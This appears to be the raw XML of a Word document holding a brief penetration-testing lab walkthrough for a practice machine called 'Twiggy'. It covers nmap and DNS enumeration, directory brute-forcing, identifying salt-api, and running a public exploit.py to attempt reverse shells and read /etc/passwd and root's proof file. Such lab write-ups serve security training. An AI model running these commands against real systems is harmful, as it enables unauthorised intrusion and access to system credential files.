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6FE76" w14:textId="700EADFF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 xml:space="preserve">Machine: </w:t>
      </w:r>
      <w:r w:rsidR="004D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Twiggy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D04FF3" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRP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336EAB7" w14:textId="531C7167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1. Machine Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD73D3C" w14:textId="77777777" w:rsidR="00843DCE" w:rsidRP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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Short Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB22895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9B9A771" w14:textId="05376F36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2. Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52595731" w14:textId="107BA44F" w:rsidR="00843DCE" w:rsidRP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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap Scan Command:</w:t>
      </w:r>
      <w:r w:rsidR="004D6AD9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4D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D6AD9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4D6AD9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52999D37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62E2A5C3" w14:textId="12689E9D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3. Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="165A0924" w:rsidR="00843DCE" w:rsidRDefault="0065415A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port 53 is open so we can do DNS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NLnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BFFA93D" w14:textId="049B0F69" w:rsidR="0065415A" w:rsidRDefault="0065415A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dig -x @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t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE19EB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DE19EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE19EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = change -x to all, any, txt, ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C0899" w14:textId="4FD4C378" w:rsidR="00DE19EB" w:rsidRDefault="00BD11ED" w:rsidP="00843DCE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feroxbuster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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00363A37">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w direcotory-2-3-small.txt</w:t>
      </w:r>
      <w:r w:rsidR="005314C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7D628" w14:textId="6A3118F3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4. Code Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1E3E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7AAABFB4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78E5BB1E" w14:textId="5EE10C89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5. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1839E" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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visit the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t_ip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with 8000 = obtain request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E30CDB" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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we notice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x_upstream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= salt-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/3000-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170F9D7" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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search exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D5D23" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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we obtain the page where the full exploit is there so use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1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3620FF8B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0CEF4102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6. Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB8469" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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it has exploit.py so copy and paste it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03037ED3" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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and it has syntax to be run so use that </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38250D7D" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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python3 exploit.py - -master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t_ip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= we obtain root key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00834E08" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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python3 exploit.py - -master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t_ip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 -exec “try different reverse shell scripts”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48553650" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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we tried with the a lot of reverse script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genetaor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but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its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not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081177C1" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A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then we go to change something as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BDA24" w14:textId="77777777" w:rsidR="00EC092A" w:rsidRDefault="00EC092A" w:rsidP="00EC092A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CC8CBC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0C2A148D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7367FE24" w14:textId="4A3FC9B5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7. Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D756D1E" w14:textId="77777777" w:rsidR="00072888" w:rsidRDefault="00072888" w:rsidP="00072888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python3 exploit.py - -master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t_ip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 -read ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd’ = and we obtain it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7C71A" w14:textId="77777777" w:rsidR="00072888" w:rsidRDefault="00072888" w:rsidP="00072888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here we obtain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root:xxxxxxxxxxxx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means we can access root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE1AEC" w14:textId="77777777" w:rsidR="00072888" w:rsidRDefault="00072888" w:rsidP="00072888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python3 exploit.py - -master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t_ip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 -read ‘root/proof.txt’ = and we obtain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB878F" w14:textId="77777777" w:rsidR="00072888" w:rsidRDefault="00072888" w:rsidP="00072888">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BC38C9" w14:textId="77777777" w:rsidR="00072888" w:rsidRDefault="00072888" w:rsidP="00072888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just follow the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30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6922CFE8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7CC4E7C" w14:textId="1F85BFFB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8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D8C61" w14:textId="0E74D881" w:rsidR="00A311DF" w:rsidRPr="00072888" w:rsidRDefault="0007288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en-US"/>
        </w:rPr>
        <w:t>on Desktop we obtain the proof.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="000728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AFB"/>
    <w:rsid w:val="00072888"/>
    <w:rsid w:val="00072CC2"/>
    <w:rsid w:val="00073A8C"/>
    <w:rsid w:val="000770B5"/>
    <w:rsid w:val="00091628"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000F7392"/>
    <w:rsid w:val="001852D4"/>
    <w:rsid w:val="001E1E8F"/>
    <w:rsid w:val="00287A36"/>
    <w:rsid w:val="002F531A"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004442C8"/>
    <w:rsid w:val="004D6AD9"/>
    <w:rsid w:val="004E38FB"/>
    <w:rsid w:val="005314C7"/>
    <w:rsid w:val="00605320"/>
    <w:rsid w:val="0065415A"/>
    <w:rsid w:val="00654466"/>
    <w:rsid w:val="006B7C10"/>
    <w:rsid w:val="0076529A"/>
    <w:rsid w:val="007E1F83"/>
    <w:rsid w:val="007F76F9"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00917F23"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AF6045"/>
    <w:rsid w:val="00BD11ED"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D649C8"/>
    <w:rsid w:val="00DE19EB"/>
    <w:rsid w:val="00E030AB"/>
    <w:rsid w:val="00EC092A"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F80FFC"/>
    <w:rsid w:val="00F94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D596D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E03A3A5B-E9F2-43CE-B86B-8D51C3210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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6A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6AF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D11E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11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t_ip:800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173</Words>
  <Characters>988</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 Manvar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhavya Manvar</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-30T16:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>